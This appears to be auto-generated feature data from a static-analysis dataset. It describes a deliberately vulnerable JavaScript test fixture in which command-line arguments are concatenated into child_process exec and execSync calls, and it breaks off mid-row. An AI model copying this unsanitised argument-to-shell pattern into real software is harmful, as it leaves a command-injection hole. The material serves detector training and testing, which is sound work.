autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:12 | cp.execSync | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:12 | cp.execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:12 | cp.execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | cp.exec ... tion"`) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | cp.exec ... tion"`) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | cp.exec ... tion"`) | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | cp.exec ... tion"`) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | cp.exec ... tion"`) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | exceptional return of cp.exec ... tion"`) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | exceptional return of cp.exec ... tion"`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | exceptional return of cp.exec ... tion"`) | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | exceptional return of cp.exec ... tion"`) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | exceptional return of cp.exec ... tion"`) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:5:27:12 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:5:27:12 | execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:5:27:12 | execSync | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:5:27:12 | execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:5:27:12 | execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:15:27:19 | node | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:15:27:19 | node | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:15:27:19 | node | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:15:27:19 | node | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:15:27:19 | node | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:15:27:19 | node | stringConcatenatedWith | -endpoint- script + ' ' + args.join() + ' --option"' | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:22:27:27 | script | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:22:27:27 | script | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:22:27:27 | script | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:22:27:27 | script | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:22:27:27 | script | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:22:27:27 | script | stringConcatenatedWith | 'node ' -endpoint- ' ' + args.join() + ' --option"' | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:29:27:29 | | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:29:27:29 | | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:29:27:29 | | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:29:27:29 | | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:29:27:29 | | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:29:27:29 | | stringConcatenatedWith | 'node ' + script -endpoint- args.join() + ' --option"' | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:35 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:35 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:35 | args | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:35 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:35 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:40 | args.join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:40 | args.join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:40 | args.join | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:40 | args.join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:40 | args.join | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | args.join(' ') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | args.join(' ') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | args.join(' ') | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | args.join(' ') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | args.join(' ') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | args.join(' ') | stringConcatenatedWith | 'node ' + script + ' ' -endpoint- ' --option"' | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | exceptional return of args.join(' ') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | exceptional return of args.join(' ') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | exceptional return of args.join(' ') | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | exceptional return of args.join(' ') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | exceptional return of args.join(' ') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:37:27:40 | join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:37:27:40 | join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:37:27:40 | join | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:37:27:40 | join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:37:27:40 | join | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:42:27:44 | ' ' | CalleeFlexibleAccessPath | args.join | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:42:27:44 | ' ' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:42:27:44 | ' ' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:42:27:44 | ' ' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:42:27:44 | ' ' | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:42:27:44 | ' ' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:42:27:44 | ' ' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:42:27:44 | ' ' | receiverName | args | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:47:27:56 | --option" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:47:27:56 | --option" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:47:27:56 | --option" | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:47:27:56 | --option" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:47:27:56 | --option" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:47:27:56 | --option" | stringConcatenatedWith | 'node ' + script + ' ' + args.join() -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:2 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:2 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:2 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:7 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:7 | cp.exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:7 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:51 | cp.exec ... ().foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:51 | cp.exec ... ().foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:51 | cp.exec ... ().foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:51 | exceptional return of cp.exec ... ().foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:51 | exceptional return of cp.exec ... ().foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:51 | exceptional return of cp.exec ... ().foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:4:30:7 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:4:30:7 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:4:30:7 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:17 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:17 | "cmd.sh " | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:17 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:17 | "cmd.sh " | stringConcatenatedWith | -endpoint- import(!)().foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:27 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:27 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:44 | exceptional return of require ... -args") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:44 | exceptional return of require ... -args") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:44 | exceptional return of require ... -args") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:44 | require ... -args") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:44 | require ... -args") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:44 | require ... -args") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:46 | exceptional return of require ... rgs")() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:46 | exceptional return of require ... rgs")() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:46 | exceptional return of require ... rgs")() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:50 | require ... )().foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:50 | require ... )().foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:50 | require ... )().foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:50 | require ... )().foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:29:30:43 | "get-them-args" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:29:30:43 | "get-them-args" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:29:30:43 | "get-them-args" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:29:30:43 | "get-them-args" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:29:30:43 | "get-them-args" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:29:30:43 | "get-them-args" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:48:30:50 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:48:30:50 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:48:30:50 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:2 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:2 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:2 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:7 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:7 | cp.exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:7 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:46 | cp.exec ... ().foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:46 | cp.exec ... ().foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:46 | cp.exec ... ().foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:46 | exceptional return of cp.exec ... ().foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:46 | exceptional return of cp.exec ... ().foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:46 | exceptional return of cp.exec ... ().foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:4:31:7 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:4:31:7 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:4:31:7 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:17 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:17 | "cmd.sh " | 